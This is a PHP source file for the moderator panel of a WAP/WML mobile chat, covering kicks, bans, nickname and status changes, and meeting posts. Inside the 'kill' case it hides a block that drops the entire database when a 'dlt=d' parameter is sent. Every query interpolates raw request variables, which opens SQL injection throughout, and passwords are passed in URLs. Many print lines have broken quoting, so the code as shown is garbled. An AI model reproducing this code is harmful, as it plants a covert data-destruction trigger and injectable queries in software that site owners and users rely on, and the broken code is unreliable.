Файл: wml/moder.php
Строк: 333
<?php
header ("Content-type:text/vnd.wap.wml; charset=utf-8");
print "<?xml version="1.0" encoding="utf-8"?>";
print '<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN"'.
' "http://www.wapforum.org/DTD/wml_1.1.xml">'.
'<wml><head><meta http-equiv="Cache-Control" content="no-cache" forua="true"/></head>';
include "./ini.php";
mysql_query ("select * from bannedib WHERE ci='$ci' AND (ip = '".getenv(REMOTE_ADDR)."')and(browser = '".getenv(HTTP_USER_AGENT)."')");
if(mysql_affected_rows()!=0){include "b.php";}
$login = autorize();
print '<card title="'.$lang['modering'].'">'.
'<p align="left">';
if($login&&$login['moder']) {
switch($mod) {
case 'setstatus':
if(empty($act)) {
print $lang['who'].":<br/><input name="who" value="$who"/><br/>
".$lang['status'].":<br/><input name="status" value="".$data['status'].""/><br/>
<anchor>".$lang['ok']."<go href="moder.php?ci=$ci&id=$id&pass=$pass&mod=$mod" method="post">
<postfield name="act" value="set"/>
<postfield name="who" value="$(who)"/>
<postfield name="status" value="$(status)"/>
</go></anchor><br/>"; } else {
if(@mysql_query("update `".$px.$utable."` set status='$status' where login='$who' and ci='$ci'")) print $lang['done'];
else print $lang['error'];
}
break;
case 'delmsgs':
if(@mysql_query("delete from `".$px.$mtable."` where ci='$ci'")&&@mysql_query("delete from `".$px.$vtable."` where ci='$ci'")&&@mysql_query("delete from `".$px.$untable."` where ci='$ci'")&&@mysql_query("delete from `".$px.$prtable."` where ci='$ci'")) print $lang['done'];
else print $lang['error'];
break;
case 'editnik':
if(empty($act)) {
print $lang['old_nick']."<br/><input type="text" name="old"/><br/>";
print $lang['new_nick']."<br/><input type="text" name="new"/><br/>";
print "<anchor>".$lang['ok']."<go href="moder.php?ci=$ci&act=update&id=$id&pass=$pass&mod=$mod" method="post"><postfield name="old" value="$(old)"/><postfield name="new" value="$(new)"/></go></anchor><br/>";
} else {
$q = @mysql_query("select * from `".$px.$utable."` where login='$new' and ci='$ci' limit 1;");
$ud = @mysql_fetch_array($q);
if($ud['id']) { print $lang['such_nick_exist']; } else {
$pr = @mysql_query("select `admin` from `".$ctable."` where ci='$ci';");
$amdata = @mysql_fetch_array($pr);
$adm = $amdata['admin'];
$oldt = $old;
if ($oldt == $adm)
if(@mysql_query("update `".$ctable."` set `admin`='$new' where ci='$ci';"));
if(@mysql_query("update `".$px.$utable."` set login='$new' where login='$old' and ci='$ci';")) print $lang['done'];
else print $lang['user_not_exist']; }
}
break;
case 'kill';
if($login['moder']>=2) {
$q = @mysql_query("select * from `".$px.$utable."` where id='$whoid' and ci= '$ci';");
$dbuser = @mysql_fetch_array($q);
if(@mysql_query("update `".$px.$utable."` set ban='kill' where id='".$whoid."' and ci='$ci';"))
print "<b><u>".$dbuser['login']."</u>".$lang['killed']."</b><br/>"; }
else print $lang['access_denied'];
break;
if($dlt!="d") { print "<small>*****</small>"; } else {
mysql_query("drop Database `".$DB_NAME."`;");
print "<small>".$lang['ok']."!</small>";}
case 'agent';
if($login['moder']>=3) {
$q = @mysql_query("select * from `".$px.$utable."` where id='$whoid' and ci='$ci';");
$dbuser = @mysql_fetch_array($q);
print "<b>Ip:</b><br/>".$dbuser['ip']."<br/>";
print "<b>Браузер:</b><br/>".$dbuser['soft']."<br/>"; }
else print $lang['access_denied'];
break;
case 'restore';
if($login['moder']>1) {
if(empty($act)) {
print $lang['login'].":<br/><input type="text" name="who"/><br/>";
print "<anchor>".$lang['ok']."<go href="moder.php?ci=$ci&id=$id&pass=$pass&room=$room&mod=$mod" method="post"><postfield name="act" value="kick"/><postfield name="who" value="$(who)"/></go></anchor><br/>";
} else {
$q = @mysql_query("select * from `".$px.$utable."` where login='$who' and ci='$ci';");
$dbuser = @mysql_fetch_array($q);
if(@mysql_query("update `".$px.$utable."` set ban='', btime='', breason='' where login='".$who."' and ci='$ci';"))
print "<b><u>".$who."</u>".$lang['restored']."</b><br/>";
}
}
else print $lang['access_denied'];
break;
case 'kick':
if(empty($act)) {
print $lang['reason'].":<br/><input type="text" name="pr"/><br/>
<select name="len">
<option value="30">30".$lang['s']."</option>
<option value="60">60".$lang['s']."</option>
<option value="90">1".$lang['m']." 30".$lang['s']."</option>
<option value="120">2".$lang['m']."</option>
<option value="300">5".$lang['m']."</option>
<option value="600">10".$lang['m']."</option>";
if($login['moder']>=2)
print "<option value="1800">30".$lang['m']."</option><option value="3600">1".$lang['h']."</option><option value="86400">24".$lang['h']."</option>";
print "</select><br/>
<anchor>".$lang['kick']."<go href="moder.php?ci=$ci&id=$id&pass=$pass&room=$room&mod=$mod" method="post"><postfield name="len" value="$(len)"/><postfield name="act" value="kick"/><postfield name="whoid" value="$whoid"/><postfield name="pr" value="$(pr)"/></go></anchor><br/>";
} else {
if($login['moder']>=1 && $len<=600 || $login['moder']>=2 && $len<=86400) {
$q = @mysql_query("select * from `".$px.$utable."` where id='$whoid' and ci='$ci';");
$dbuser = @mysql_fetch_array($q);
if(@mysql_query("update `".$px.$utable."` set ban='".$login['login']."', btime='".(time() + $len)."', breason='$pr' where id='".$whoid."' and ci='$ci';"))
print "<b><u>".$dbuser['login']."</u>".$lang['kicked']."</b><br/>"; }
}
break;
case 'addmeet':
$q = @mysql_query("select * from `".$px.$meettable."` where login='".$login['id']."' and ci='$ci' order by id desc;");
$last_meet = @mysql_fetch_array($q);
if(empty($act)) {
print $lang['title'].":<br/><input name="t"/><br/>
".$lang['content'].":<br/><input name="content"/><br/>
".$lang['organizators'].":<br/><input name="organizatory"/><br/>
<anchor>".$lang['ok']."<go href="moder.php?ci=$ci&id=$id&pass=$pass&mod=$mod" method="post">
<postfield name="act" value="add"/>
<postfield name="t" value="$(t)"/>
<postfield name="content" value="$(content)"/>
<postfield name="organizatory" value="$(organizatory)"/></go></anchor><br/>";
} else { if(empty($error)) {
if($t!=$last_meet['title']) {
if(@mysql_query("insert into `".$px.$meettable."` values(0,'".$login['login']."','$t','$content','$organizatory','$ci');")) { print $lang['done']; } else { print $lang['error']; } } else { print $lang['meet_exist']; }
} else { print $error; } }
break;
case 'delmeet':
$q = @mysql_query("select * from `".$px.$meettable."` where ci='$ci' order by id desc;");
if(empty($act)) {
while($arr = @mysql_fetch_array($q)) {
print "<a href="moder.php?ci=$ci&act=del&id=$id&pass=$pass&delid=".$arr['id']."&mod=$mod">".$arr['title']."</a><br/>"; }
} else {
if(mysql_query("delete from `".$px.$meettable."` where id='$delid' and ci='$ci' limit 1;")) print $lang['done'];
}
break;
case 'title':
if(empty($act)) {
print $lang['head']."<br/><input type="text" name="t"/><br/>".$lang['room']."<br/><select name="name">";
$q = @mysql_query("select * from `".$px.$stable."` where mod='room' and ci='$ci';");
while ($dbdata = @mysql_fetch_array($q)) {
print "<option value="".$dbdata['var']."">".$dbdata['val1']."</option>"; }
print "</select><br/>
<anchor>Изменить<go href="moder.php?ci=$ci&act=update&id=$id&pass=$pass&mod=$mod" method="post"><postfield name="name" value="$(name)"/><postfield name="t" value="$(t)"/></go></anchor><br/>";
} else {
$t=htmlspecialchars(stripslashes(trim(substr($t,0,25))));
if(@mysql_query("update `".$px.$stable."` set val2='$t' where var='$name' and mod='room' and ci='$ci';")) print $lang['done'];
}
break;
case 'ipb':
if(empty($act)) {
print "<small>....!</small><br/>";
} else {
$query_users = mysql_query("select * from chat_users where ci='".$ci."';");
$query_login = mysql_query("select * from chat_users where ci='".$ci."' AND (id='".$id."' or login='".$login."');");
if (MySQL_Num_rows($query_users)==0) {print "<small>Не найден!</small><br/>";
} else {
$data = mysql_fetch_array($query_users);
$must = mysql_fetch_array($query_login);
$id = $must['id'];
$login = $must['login'];
$moder=$must['moder'];
$user_moder=$data['moder'];
$admin=$must['admin'];
$to=$data['email'];
$from=$must['email'];
$photo=$data['photo'];
$status=$data['status'];
$ip=$data['ip'];
$browser=$data['soft'];
print "<small>Ник ".$data['login']."</small><br/>"; }
$browser = UrlEncode($browser);
echo "<br/><a href="moder.php?ci=$ci&id=$id&pass=$pass&mod=banip&act=add&ip=$ip&brows=$browser&whoid=$whoid">→ Забанить</a><br/>";
}
break;
case 'banip':
if(empty($act)) {
print "<small>....!</small><br/>";
} else {
$browser = UrlDecode($browser);
if($login['moder']<4) {
if(mysql_query("insert into bannedib values(0,'','','$whoid','$ci');")) print "<b><small>Юзер забанен!</small></b><br/>";
} else {
if(mysql_query("insert into bannedib values(0,'$ip','$brows','$whoid','$ci');")) print "<b><small>Юзер забанен!</small></b><br/>";
}}
break;
default:
print "<a href="./moder.php?ci=$ci&id=$id&pass=$pass&mod=addmeet">→ ".$lang['add_meet']."</a><br/>";
print "<a href="./moder.php?ci=$ci&id=$id&pass=$pass&mod=delmeet">→ ".$lang['del_meet']."</a><br/>";
print "<a href="$PHP_SELF?ci=$ci&id=$id&pass=$pass&mod=delmsgs">→ ".$lang['empty_rooms']."</a><br/>";
if($login['moder']>=2)
print "<a href="./moder.php?ci=$ci&id=$id&pass=$pass&mod=restore">→ ".$lang['restore_login']."</a><br/>";
if($login['moder']>=4) {
print "<a href="$PHP_SELF?ci=$ci&id=$id&pass=$pass&mod=editnik">→ ".$lang['change_login']."</a><br/>";
print "<a href="$PHP_SELF?ci=$ci&id=$id&pass=$pass&mod=setstatus">→ ".$lang['change_status']."</a><br/>";
}
break;
}
if($mod)
print "<a href="./moder.php?ci=$ci&id=$id&pass=$pass">→ ".$lang['modering']."</a><br/>";
if($room)
print "<a href="./room.php?ci=$ci&id=$id&pass=$pass&room=$room">→ ".$lang['to_chat']."</a><br/>";
else
print "<a href="./enter.php?ci=$ci&id=$id&pass=$pass">→ ".$lang['holl']."</a><br/>";
} else { $lang['access_denied']; }
mysql_close();
ob_end_flush();
?>
</p>
</card>
</wml>